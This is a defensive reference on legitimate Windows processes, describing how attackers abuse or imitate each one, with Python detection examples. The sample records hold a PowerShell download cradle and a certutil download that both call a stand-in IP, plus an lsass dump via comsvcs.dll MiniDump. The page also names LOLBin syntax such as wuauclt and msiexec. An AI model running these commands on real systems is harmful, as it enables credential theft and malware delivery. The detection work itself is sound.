# Legitimate Windows Processes

## **1. System-Level Processes**

**`System`**

* **Path:** N/A (kernel-mode process, always PID 4, no image on disk)
* **Purpose:** Hosts the kernel and driver threads; it is the parent of `smss.exe`.
* **Attack Use:** Cannot be replaced on disk, but kernel-mode rootkits and malicious drivers execute inside it. A process named `System` with a PID other than 4, a disk path, or a parent other than PID 0 is masquerading.

**`smss.exe` (Session Manager Subsystem)**

* **Path:** `C:\Windows\System32\smss.exe`
* **Purpose:** First user-mode process, started by `System`. The master instance stays resident and spawns a short-lived copy of itself for each session; that copy starts `csrss.exe` plus `wininit.exe` (session 0) or `winlogon.exe` (interactive sessions) and then exits, which is why those processes show a parent PID that no longer exists.
* **Attack Use:** Rarely abused directly. Expect one resident instance, parent `System`, session 0, System32 path; a second long-lived `smss.exe`, or one with a different parent or path, is a masquerading signal.

**`csrss.exe` (Client/Server Runtime Subsystem)**

* **Path:** `C:\Windows\System32\csrss.exe`
* **Purpose:** Win32 subsystem process, one per session: console window handling, process and thread bookkeeping, and shutdown.
* **Attack Use:** Frequently imitated (a lookalike name, or the real name run from the wrong directory) because users rarely question it. Legitimate instances live in System32, run as SYSTEM, and have an already-exited `smss.exe` as parent.

**`wininit.exe` (Windows Initialization)**

* **Path:** `C:\Windows\System32\wininit.exe`
* **Purpose:** Session 0 initialization: launches `services.exe` (the Service Control Manager) and `lsass.exe`.
* **Attack Use:** Rarely abused; a `wininit.exe` outside System32, outside session 0, or present more than once is masquerading.

## **2. Service Host Processes**

**`svchost.exe` (Service Host)**

* **Path:** `C:\Windows\System32\svchost.exe`
* **Purpose:** Generic host for services implemented as DLLs. Each instance is started by `services.exe` with a `-k <group>` argument naming the service group, so many instances are normal.
* **Attack Use:** The most imitated process name and a common injection target. Instances not parented by `services.exe`, started without `-k`, or running from outside System32 are suspect.

**`services.exe` (Service Control Manager)**

* **Path:** `C:\Windows\System32\services.exe`
* **Purpose:** Service Control Manager: starts, stops and tracks services and is the parent of `svchost.exe` and other service processes. Single instance, session 0, parent `wininit.exe`.
* **Attack Use:** Attackers create services (`sc create`, `New-Service`, PsExec) for persistence and lateral movement; the new service's `ImagePath` and the service-installation events (System log Event ID 7045, Security Event ID 4697 when auditing is enabled) are the evidence.
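The expectations in sections 1 and 2 (image path, parent, instance count, session, and the `-k` argument for `svchost.exe`) are what an analyst checks first against a process listing. The block below is an added example, not code from the original page: a Python baseline check over a listing exported from tasklist, Volatility or an EDR, assumed to carry `pid`, `ppid`, `name`, `path`, `session` and `cmdline` fields. The listing, its PIDs and the three planted anomalies are constructed. The lookalike-name test goes a little beyond the masquerading cases described above by also catching single-character substitutions and adjacent swaps.

```python
"""Baseline check for the boot-chain and service-host processes in sections 1 and 2.

Added example, not from the original page. BASELINE encodes the expectations above
(image path, acceptable parent, single instance, session, and -k for svchost.exe);
the listing is constructed sample data with three planted anomalies.
"""

# Acceptable parents are image names; None means "parent already exited", which is
# normal for children of the per-session smss.exe copy and of userinit.exe.
# smss.exe is a singleton apart from its short-lived per-session copies.
BASELINE = {
    "system":       {"path": None, "parents": {None}, "singleton": True, "session": 0},
    "smss.exe":     {"path": r"c:\windows\system32\smss.exe", "parents": {"system"}, "singleton": True, "session": 0},
    "csrss.exe":    {"path": r"c:\windows\system32\csrss.exe", "parents": {None, "smss.exe"}, "singleton": False, "session": None},
    "wininit.exe":  {"path": r"c:\windows\system32\wininit.exe", "parents": {None, "smss.exe"}, "singleton": True, "session": 0},
    "winlogon.exe": {"path": r"c:\windows\system32\winlogon.exe", "parents": {None, "smss.exe"}, "singleton": False, "session": None},
    "services.exe": {"path": r"c:\windows\system32\services.exe", "parents": {"wininit.exe"}, "singleton": True, "session": 0},
    "lsass.exe":    {"path": r"c:\windows\system32\lsass.exe", "parents": {"wininit.exe"}, "singleton": True, "session": 0},
    "svchost.exe":  {"path": r"c:\windows\system32\svchost.exe", "parents": {"services.exe"}, "singleton": False, "session": None},
    "explorer.exe": {"path": r"c:\windows\explorer.exe", "parents": {None, "userinit.exe", "explorer.exe"}, "singleton": False, "session": None},
}

SAMPLE_LISTING = [  # constructed; PIDs are arbitrary, 460 and 2800 are parents that have exited
    {"pid": 4,    "ppid": 0,    "name": "System",       "path": "",                                  "session": 0, "cmdline": ""},
    {"pid": 368,  "ppid": 4,    "name": "smss.exe",     "path": r"C:\Windows\System32\smss.exe",     "session": 0, "cmdline": r"\SystemRoot\System32\smss.exe"},
    {"pid": 480,  "ppid": 460,  "name": "csrss.exe",    "path": r"C:\Windows\System32\csrss.exe",    "session": 0, "cmdline": r"%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows"},
    {"pid": 560,  "ppid": 460,  "name": "wininit.exe",  "path": r"C:\Windows\System32\wininit.exe",  "session": 0, "cmdline": "wininit.exe"},
    {"pid": 640,  "ppid": 560,  "name": "services.exe", "path": r"C:\Windows\System32\services.exe", "session": 0, "cmdline": r"C:\Windows\system32\services.exe"},
    {"pid": 656,  "ppid": 560,  "name": "lsass.exe",    "path": r"C:\Windows\System32\lsass.exe",    "session": 0, "cmdline": r"C:\Windows\system32\lsass.exe"},
    {"pid": 820,  "ppid": 640,  "name": "svchost.exe",  "path": r"C:\Windows\System32\svchost.exe",  "session": 0, "cmdline": r"C:\Windows\system32\svchost.exe -k DcomLaunch -p"},
    {"pid": 2900, "ppid": 2800, "name": "explorer.exe", "path": r"C:\Windows\explorer.exe",          "session": 1, "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 3104, "ppid": 2900, "name": "svchost.exe",  "path": r"C:\Users\alice\AppData\Roaming\svchost.exe", "session": 1, "cmdline": "svchost.exe"},
    {"pid": 3320, "ppid": 2900, "name": "lsass.exe",    "path": r"C:\Windows\System32\lsass.exe",    "session": 1, "cmdline": "lsass.exe"},
    {"pid": 3400, "ppid": 2900, "name": "scvhost.exe",  "path": r"C:\Users\alice\AppData\Local\Temp\scvhost.exe", "session": 1, "cmdline": "scvhost.exe"},
]

def lookalike(name, legit):
    """True when name is one insertion, deletion, substitution or adjacent swap away
    from legit (and not identical): catches svch0st.exe and scvhost.exe."""
    if name == legit or abs(len(name) - len(legit)) > 1:
        return False
    i = 0
    while i < min(len(name), len(legit)) and name[i] == legit[i]:
        i += 1
    if i == min(len(name), len(legit)):
        return True                                   # differ only by a trailing character
    if len(name) == len(legit):
        swapped = (i + 1 < len(name) and name[i] == legit[i + 1]
                   and name[i + 1] == legit[i] and name[i + 2:] == legit[i + 2:])
        return name[i + 1:] == legit[i + 1:] or swapped
    if len(name) > len(legit):
        return name[i + 1:] == legit[i:]              # one extra character in name
    return name[i:] == legit[i + 1:]                  # one missing character in name

def check_listing(listing, baseline=BASELINE):
    """Return (pid, name, reason) for every deviation from the baseline."""
    by_pid = {p["pid"]: p for p in listing}
    counts = {}
    for p in listing:
        counts[p["name"].lower()] = counts.get(p["name"].lower(), 0) + 1
    findings = []
    for p in listing:
        pid, name = p["pid"], p["name"].lower()
        rule = baseline.get(name)
        if rule is None:
            # Not a baseline name: only look for masquerading by lookalike name.
            findings += [(pid, name, f"name is one edit away from {legit}")
                         for legit in baseline if lookalike(name, legit)]
            continue
        if rule["path"] and p["path"].lower() != rule["path"]:
            findings.append((pid, name, f"unexpected image path {p['path']}"))
        parent = by_pid.get(p["ppid"])
        parent_name = parent["name"].lower() if parent else None
        if parent_name not in rule["parents"]:
            findings.append((pid, name, f"unexpected parent {parent_name or '<exited>'} (ppid {p['ppid']})"))
        if rule["singleton"] and counts[name] > 1:
            # Every instance is reported; the other findings show which one is the impostor.
            findings.append((pid, name, f"{counts[name]} instances of a singleton process"))
        if rule["session"] is not None and p["session"] != rule["session"]:
            findings.append((pid, name, f"session {p['session']}, expected {rule['session']}"))
        if name == "svchost.exe" and "-k" not in p["cmdline"].lower().split():
            findings.append((pid, name, "svchost.exe started without a -k service group"))
    return findings

if __name__ == "__main__":
    for pid, name, reason in check_listing(SAMPLE_LISTING):
        print(f"PID {pid:>5} {name:<14} {reason}")
```

Both `lsass.exe` instances are reported under the singleton rule; the path, parent and session findings identify which one is the impostor, so read the findings per PID rather than as a bare count. The baseline is deliberately strict (for example `svchost.exe` must be a child of `services.exe`); relax it only with a documented reason for the environment.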

## **3. User-Level Processes**

**`explorer.exe` (Windows Explorer)**

* **Path:** `C:\Windows\explorer.exe`
* **Purpose:** Windows shell: desktop, taskbar, Start menu and file browsing. Normally one instance per logged-on user, started by `userinit.exe` (which then exits), so its parent PID usually no longer exists.
* **Attack Use:** Often abused for persistence via COM hijacking or DLL injection, and a favoured injection target because its network connections and child processes look routine.

**`taskhostw.exe` (Task Host)**

* **Path:** `C:\Windows\System32\taskhostw.exe`
* **Purpose:** Generic host for scheduled tasks implemented as DLLs (`taskhost.exe` on Windows 7, `taskhostex.exe` on Windows 8).
* **Attack Use:** A DLL-based task can be registered so that this host loads a malicious DLL; inspect the task definitions under `C:\Windows\System32\Tasks`, not the host binary.

**`dllhost.exe` (COM Surrogate)**

* **Path:** `C:\Windows\System32\dllhost.exe`
* **Purpose:** COM Surrogate: hosts out-of-process COM servers so that a crash does not take down the caller. Legitimate instances carry a `/Processid:{GUID}` argument.
* **Attack Use:** COM hijacking (a malicious `InprocServer32` registered under `HKCU\Software\Classes\CLSID`) makes the surrogate load attacker DLLs; a `dllhost.exe` with no `/Processid` on its command line is a common masquerade.

**`cmd.exe` (Command Prompt)**

* **Path:** `C:\Windows\System32\cmd.exe`
* **Purpose:** Command-line interpreter for commands and batch files.
* **Attack Use:** Used to run commands and chain other utilities (`/c`). The binary itself is always legitimate, so the parent (an Office document, a browser, a web server worker) and the command line are what to judge.

**`powershell.exe` (PowerShell)**

* **Path:** `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` (32-bit copy under `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\`)
* **Purpose:** Scripting engine for automation and management tasks.
* **Attack Use:** Primary attacker tooling: encoded commands (`-EncodedCommand`), download cradles (`IEX`, `DownloadString`) and in-memory loading that never touches disk. Script Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) and full command-line logging are the main evidence.

## **4. Authentication, Remote Access and Script-Host Processes**

**`lsass.exe` (Local Security Authority Subsystem Service)**

* **Path:** `C:\Windows\System32\lsass.exe`
* **Purpose:** Enforces the local security policy, performs authentication (Kerberos, NTLM, local SAM) and issues access tokens. Single instance, session 0, parent `wininit.exe`.
* **Attack Use:** Its memory is read or dumped to recover credentials (Mimikatz, ProcDump, Task Manager, `rundll32 comsvcs.dll,MiniDump`). A handle opened on `lsass.exe` with `PROCESS_VM_READ` from an unexpected image (Sysmon Event ID 10, ProcessAccess) is the primary detection; LSA Protection (`RunAsPPL`) and Credential Guard limit the attack.
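The ProcessAccess detection mentioned for `lsass.exe` above is normally built on Sysmon Event ID 10. The block below is an added example, not code from the page or from Sysmon: it triages constructed Event ID 10 records by the `GrantedAccess` mask and the `CallTrace`, keeping `PROCESS_VM_READ` as the gate and treating a minidump library on the stack, an unbacked (`UNKNOWN`) frame, write or thread rights, or a source image outside Windows and Program Files as strong signals. The events, stack offsets, the vendor agent path and the allowlist are constructed and must be tuned per environment.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records whose target is lsass.exe.

Added example, not from the original page. GrantedAccess is the access mask the
source obtained on lsass; reading its memory needs PROCESS_VM_READ, so that bit
is the gate, and CallTrace shows how the handle was used. The events, stack
offsets, paths and the allowlist are constructed sample data.
"""
import ntpath

PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF

# Images allowed to read lsass memory (constructed; in practice the AV/EDR engine
# and a few OS components, tuned per environment).
ALLOWED_SOURCE_NAMES = {"msmpeng.exe", "csrss.exe", "wininit.exe"}
# Libraries that implement or wrap MiniDumpWriteDump.
DUMP_LIBRARIES = ("dbghelp.dll", "dbgcore.dll", "comsvcs.dll")

def triage_event(event):
    """Return a finding for one Event ID 10 record, or None if it is benign here."""
    if ntpath.basename(event["TargetImage"]).lower() != "lsass.exe":
        return None
    access = int(event["GrantedAccess"], 16)
    if not (access & PROCESS_VM_READ):
        return None                                   # cannot read memory: not a dump
    source = event["SourceImage"]
    if ntpath.basename(source).lower() in ALLOWED_SOURCE_NAMES:
        return None
    reasons, strong = ["handle includes PROCESS_VM_READ"], False
    if (access & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
        reasons.append("PROCESS_ALL_ACCESS requested (ProcDump / Task Manager style)")
    elif access & (PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD):
        reasons.append("write or thread rights on lsass (injection, not just a dump)")
        strong = True
    # CallTrace is "module+offset|module+offset|..."; UNKNOWN marks unbacked memory.
    frames = [f.split("+", 1)[0].lower() for f in event.get("CallTrace", "").split("|") if f]
    if any(ntpath.basename(f) in DUMP_LIBRARIES for f in frames):
        reasons.append("call trace passes through a minidump library")
        strong = True
    if any(f.startswith("unknown") for f in frames):
        reasons.append("call trace includes unbacked memory (UNKNOWN frame)")
        strong = True
    low = source.lower()
    if not (low.startswith("c:\\windows\\") or low.startswith("c:\\program files")):
        reasons.append("source image outside Windows or Program Files")
        strong = True
    return {"source": source, "user": event.get("SourceUser", ""), "access": hex(access),
            "severity": "high" if strong else "medium", "reasons": reasons}

def triage_events(events):
    """Findings for every lsass-targeting record, in input order."""
    return [f for f in map(triage_event, events) if f is not None]

LSASS = r"C:\Windows\system32\lsass.exe"
STACK = r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2ac96"
SAMPLE_EVENTS = [  # constructed records
    # Task Manager "Create dump file": full access, dbgcore.dll on the stack.
    {"SourceImage": r"C:\Windows\System32\Taskmgr.exe", "SourceUser": r"CORP\alice", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF", "CallTrace": STACK + r"|C:\Windows\System32\dbgcore.dll+1a2f0|C:\Windows\System32\Taskmgr.exe+7b3e1"},
    # Tool in a temp directory, Mimikatz-style 0x1010 mask, unbacked code on the stack.
    {"SourceImage": r"C:\Users\alice\AppData\Local\Temp\mm.exe", "SourceUser": r"CORP\alice", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": STACK + "|UNKNOWN(000001E3A0B10000)"},
    # rundll32 comsvcs.dll,MiniDump: legitimate binary, dump library on the stack.
    {"SourceImage": r"C:\Windows\System32\rundll32.exe", "SourceUser": "NT AUTHORITY\\SYSTEM", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF", "CallTrace": STACK + r"|C:\Windows\System32\comsvcs.dll+2e5c8|C:\Windows\System32\rundll32.exe+3f1a"},
    # Vendor agent not yet on the allowlist: read access, ordinary stack, medium.
    {"SourceImage": r"C:\Program Files\ExampleVendor\agent.exe", "SourceUser": "NT AUTHORITY\\SYSTEM", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": STACK + r"|C:\Program Files\ExampleVendor\agent.exe+4c10"},
    # Defender engine: allowlisted.
    {"SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0-0\MsMpEng.exe",
     "SourceUser": "NT AUTHORITY\\SYSTEM", "TargetImage": LSASS, "GrantedAccess": "0x1010", "CallTrace": STACK},
    # Query-only handle from a service host: no VM_READ, ignored.
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "SourceUser": "NT AUTHORITY\\SYSTEM", "TargetImage": LSASS,
     "GrantedAccess": "0x1000", "CallTrace": STACK},
    # Full access to a different target: not lsass, ignored here.
    {"SourceImage": r"C:\Windows\System32\Taskmgr.exe", "SourceUser": r"CORP\alice", "TargetImage": r"C:\Windows\explorer.exe",
     "GrantedAccess": "0x1FFFFF", "CallTrace": STACK},
]

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['source']} ({f['user']}) {f['access']}: " + "; ".join(f["reasons"]))
```

The allowlist is by image name only to keep the example short; in production key it on signer and full path, because a malicious binary can trivially be named `MsMpEng.exe`. The medium finding for the vendor agent is the expected outcome of a fresh deployment and is how the allowlist gets tuned.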

**`winlogon.exe` (Windows Logon Application)**

* **Path:** `C:\Windows\System32\winlogon.exe`
* **Purpose:** Handles interactive logons: the secure attention sequence (Ctrl+Alt+Del), credential providers, loading the user profile via `userinit.exe`, and lock/unlock. One instance per interactive session, parent an exited `smss.exe`.
* **Attack Use:** Persistence through its registry values (`Userinit` and `Shell` under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`, MITRE T1547.004); a `winlogon.exe` outside System32 or running in session 0 is masquerading.
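The Winlogon persistence above is found in the registry rather than in the process list. The block below is an added example, not code from the page: it parses the text of a `reg export` of the Winlogon key (REG_SZ values appear as `"Name"="data"` with backslashes doubled) and compares `Userinit` and `Shell` with their stock values. The exported text is constructed, with a second executable appended to `Userinit` the way T1547.004 persistence does it; the value names and stock values are the real ones, the appended path is made up.

```python
"""Check the Winlogon key from a `reg export` text file for hijacked values.

Added example, not from the original page. Parses the .reg format (values are
written as "Name"="data" with backslashes doubled) and compares Userinit and
Shell with their stock values. The export below is constructed, with the
Userinit value tampered the way T1547.004 persistence does it.
"""
import re

WINLOGON_KEY = r"hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon"
# Entries each value may contain (the registry data is a comma-separated list).
STOCK_VALUES = {
    "userinit": {r"c:\windows\system32\userinit.exe", "userinit.exe"},
    "shell": {"explorer.exe"},
}
VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)*)"=(?P<data>.*)$')

def unescape(s):
    """Undo .reg escaping of quotes and backslashes (quotes first, then backslashes)."""
    return s.replace('\\"', '"').replace("\\\\", "\\")

def parse_reg_export(text):
    """Return {key path (lower): {value name (lower): data}} for string and DWORD values."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m is None or current is None:
            continue
        data = m.group("data")
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            value = unescape(data[1:-1])
        elif data.startswith("dword:"):
            value = int(data[6:], 16)
        else:
            value = data                        # hex(...) binary values kept raw
        keys[current][unescape(m.group("name")).lower()] = value
    return keys

def check_winlogon(keys):
    """Return (value name, problem) pairs for Userinit and Shell."""
    findings = []
    values = keys.get(WINLOGON_KEY, {})
    for name, allowed in STOCK_VALUES.items():
        data = values.get(name)
        if data is None:
            findings.append((name, "value missing from export"))
            continue
        entries = [e.strip().lower() for e in str(data).split(",") if e.strip()]
        extra = [e for e in entries if e not in allowed]
        if extra:
            findings.append((name, "unexpected entries: " + ", ".join(extra)))
        if not any(e in allowed for e in entries):
            findings.append((name, "stock entry missing"))
    return findings

# Constructed export: stock key with one extra executable appended to Userinit.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoRestartShell"=dword:00000001
"Background"="0 0 0"
"DefaultDomainName"="CORP"
"LegalNoticeCaption"=""
"Shell"="explorer.exe"
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Users\\Public\\svchost.exe"
"VMApplet"="SystemPropertiesPerformance.exe /pagefile"
'''

if __name__ == "__main__":
    for name, problem in check_winlogon(parse_reg_export(SAMPLE_EXPORT)):
        print(f"{name}: {problem}")
```

The stock `Userinit` data ends with a trailing comma, which the split drops, so an untouched key produces no findings. Run the same check against the per-user key (`HKCU\...\Winlogon`) and an offline `SOFTWARE` hive when the live registry cannot be trusted.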

**`mstsc.exe` (Remote Desktop Client)**

* **Path:** `C:\Windows\System32\mstsc.exe`
* **Purpose:** Remote Desktop (RDP) client.
* **Attack Use:** Lateral movement with stolen credentials. On the source host, `HKCU\Software\Microsoft\Terminal Server Client\Servers` and `Default.rdp` record destinations; on the destination, Security Event ID 4624 with logon type 10 records the session.

**`rundll32.exe` (Run DLL as an App)**

* **Path:** `C:\Windows\System32\rundll32.exe`
* **Purpose:** Loads a DLL and calls one of its exports (`rundll32.exe <dll>,<entry point> [arguments]`).
* **Attack Use:** LOLBin: runs attacker DLLs from user-writable paths, executes script through the `javascript:` protocol handler, and fronts `comsvcs.dll,MiniDump` for LSASS dumping. An instance with no arguments, a DLL outside `%SystemRoot%`, or an argument that is not a DLL at all is suspect.

**`wscript.exe` and `cscript.exe` (Windows Script Host)**

* **Path:** `C:\Windows\System32\wscript.exe` / `C:\Windows\System32\cscript.exe`
* **Purpose:** Windows Script Host engines (`wscript.exe` for GUI, `cscript.exe` for console) that run VBScript and JScript files.
* **Attack Use:** Executes script droppers delivered as mail attachments or downloads (`.vbs`, `.js`, `.jse`, `.wsf`); judge by the script path (Downloads, Temp, AppData) and the parent (Office, browser, archive tool).
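The execution utilities above (`cmd.exe`, `powershell.exe`, `rundll32.exe`, `wscript.exe`, `cscript.exe`) are judged by parent and command line rather than by the binary. The block below is an added example, not code from the original page: it applies those judgements to constructed process-creation records (`Image`, `CommandLine`, `ParentImage`), decoding `-EncodedCommand` payloads (base64 of UTF-16LE text), checking where `rundll32.exe` loads its DLL from and whether it is fronting `comsvcs.dll,MiniDump`, flagging script hosts started from user-writable paths, and flagging any of them spawned by an Office or browser process. The records, paths, the documentation-range IP address and the parent list are all constructed.

```python
"""Command-line triage for cmd.exe, powershell.exe, rundll32.exe, wscript.exe and
cscript.exe. Added example, not from the original page; every record below is
constructed, including the encoded PowerShell payload built from ENCODED_SCRIPT."""
import base64
import binascii
import ntpath

# Parents that should almost never spawn a shell or script host (constructed list).
DOC_AND_BROWSER_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                           "msedge.exe", "chrome.exe", "firefox.exe", "acrord32.exe"}
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")  # path fragments
DOWNLOAD_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile", "frombase64string")
CHAINED_LOLBINS = ("powershell", "certutil", "bitsadmin", "mshta", "regsvr32", "wscript", "cscript", "rundll32")

def split_cmdline(cmdline):
    """Split on whitespace, honouring double quotes (simplified Windows rules)."""
    tokens, cur, quoted = [], "", False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append(cur)
            cur = ""
        else:
            cur += ch
    return tokens + [cur] if cur else tokens

def is_encoded_switch(token):
    """powershell.exe accepts -e, -ec and any 3+ letter prefix of -EncodedCommand."""
    s = token.lower().lstrip("-/")
    return s in ("e", "ec") or (len(s) >= 3 and "encodedcommand".startswith(s))

def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

def triage_process(event):
    """Return {"image", "reasons", "decoded"} for one process-creation record."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    args = split_cmdline(event["CommandLine"])[1:]
    joined = " ".join(args).lower()
    reasons, decoded = [], None
    if parent in DOC_AND_BROWSER_PARENTS:
        reasons.append(f"spawned by {parent}")
    if image == "powershell.exe":
        for i, tok in enumerate(args[:-1]):
            if is_encoded_switch(tok):
                decoded = decode_encoded_command(args[i + 1])
                reasons.append("encoded command" if decoded else "encoded command (undecodable)")
        text = (decoded or joined).lower()          # inspect the decoded script when there is one
        reasons += [f"contains {m}" for m in DOWNLOAD_MARKERS if m in text]
        flags = {a.lower().lstrip("-/") for a in args}
        if "hidden" in flags:
            reasons.append("hidden window")
        if "bypass" in flags:
            reasons.append("execution policy bypass")
    elif image == "rundll32.exe" and args:
        target = args[0].split(",", 1)[0].lower()   # DLL before ",EntryPoint"
        if target.startswith(("javascript:", "vbscript:")):
            reasons.append("script protocol handler instead of a DLL")
        elif any(m in target for m in USER_WRITABLE):
            reasons.append(f"DLL loaded from user-writable path: {args[0]}")
        if target.endswith("comsvcs.dll") and "minidump" in joined:
            reasons.append("comsvcs.dll MiniDump (process memory dump)")
    elif image in ("wscript.exe", "cscript.exe"):
        for a in args:
            if not a.startswith("/") and any(m in a.lower() for m in USER_WRITABLE):
                reasons.append(f"script from user-writable path: {a}")
    elif image == "cmd.exe":
        reasons += [f"cmd launches {n}" for n in CHAINED_LOLBINS if n in joined]
    return {"image": image, "reasons": reasons, "decoded": decoded}

# Constructed records; 198.51.100.0/24 is a documentation range, not a real host.
ENCODED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED_ARG = base64.b64encode(ENCODED_SCRIPT.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED_ARG}"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd.dll,Start"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump 656 C:\Windows\Temp\l.dmp full"},
    {"Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\invoice.vbs"'},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/x.exe C:\Users\Public\x.exe"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",   # benign scheduled script
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",  # benign
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL hotplug.dll"},
]

if __name__ == "__main__":
    for r in (triage_process(e) for e in SAMPLE_EVENTS):
        print(f"{r['image']:<14} {'; '.join(r['reasons']) or 'nothing flagged'}")
```

The decoded script is what you read, not the base64: the download cradle in the first record is invisible in the raw command line and only shows up after the UTF-16LE decode. Substring markers such as `iex` are deliberately loose; pair them with the parent check so that a routine `-NoProfile -File` scheduled script is not flagged.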

## **5. Scheduled Task and Utility Processes**

**`schtasks.exe` (Task Scheduler)**

* **Path:** `C:\Windows\System32\schtasks.exe`
* **Purpose:** Command-line front end to the Task Scheduler service (which itself runs inside `svchost.exe`); tasks are stored as XML under `C:\Windows\System32\Tasks`.
* **Attack Use:** Creates tasks for persistence or delayed execution of malware. The task XML, Security Event ID 4698 (task created, with object-access auditing enabled) and Microsoft-Windows-TaskScheduler/Operational Event ID 106 (task registered) are the evidence.

**`taskmgr.exe` (Task Manager)**

* **Path:** `C:\Windows\System32\taskmgr.exe`
* **Purpose:** Monitors running processes and system performance.
* **Attack Use:** Rarely targeted. Note that its "Create dump file" action opens the chosen process with full access and writes a minidump, so `taskmgr.exe` can appear as the source of an LSASS dump; that is an interactive step to verify against the user's session.

## **6. Browser and Media Processes**

**`msedge.exe` (Microsoft Edge)**

* **Path:** `C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe`
* **Purpose:** Web browser.
* **Attack Use:** Exploited through browser and renderer vulnerabilities and through downloads. `msedge.exe` spawning `cmd.exe`, `powershell.exe`, `wscript.exe` or `mshta.exe` is a drive-by or social-engineering indicator.

**`wmplayer.exe` (Windows Media Player)**

* **Path:** `C:\Program Files\Windows Media Player\wmplayer.exe` (64-bit) and `C:\Program Files (x86)\Windows Media Player\wmplayer.exe` (32-bit)
* **Purpose:** Plays media files.
* **Attack Use:** Crafted media files that exploit codec or parser bugs; otherwise mainly a plausible name for masquerading.

## **7. System Update Processes**

**`wuauclt.exe` (Windows Update Client)**

* **Path:** `C:\Windows\System32\wuauclt.exe`
* **Purpose:** Command-line client for Windows Update (the update engine itself runs inside `svchost.exe` as the `wuauserv` service).
* **Attack Use:** Documented LOLBin: `wuauclt.exe /UpdateDeploymentProvider <dll> /RunHandlerComServer` loads an arbitrary DLL (see LOLBAS), so an instance with those arguments and a DLL outside System32 is suspect. The name is also spoofed to disguise malware as update activity.

## **8. Administrative and Diagnostic Tools**

**`regedit.exe` (Registry Editor)**

* **Path:** `C:\Windows\regedit.exe` (a copy also exists under `System32`)
* **Purpose:** Edits the Windows Registry.
* **Attack Use:** Interactive edits and silent imports (`regedit /s file.reg`) of persistence keys. Scripted changes usually go through `reg.exe` or PowerShell instead, so `regedit.exe` launched by a script or with `/s` is worth examining.

**`msiexec.exe` (Windows Installer)**

* **Path:** `C:\Windows\System32\msiexec.exe`
* **Purpose:** Installs, repairs and removes MSI packages; the Windows Installer service side runs as SYSTEM.
* **Attack Use:** Runs attacker MSIs, including from a URL (`msiexec /q /i <URL>`); quiet installs from user-writable paths or remote locations are the signal.

**`perfmon.exe` (Performance Monitor)**

* **Path:** `C:\Windows\System32\perfmon.exe`
* **Purpose:** Monitors system performance (counters, data collector sets).
* **Attack Use:** Rarely abused; useful to an intruder for reconnaissance of services and resource usage, and otherwise a plausible lookalike name.

## **Processes Often Targeted by Attackers**

1. **High Privilege Processes:**
   * `svchost.exe`
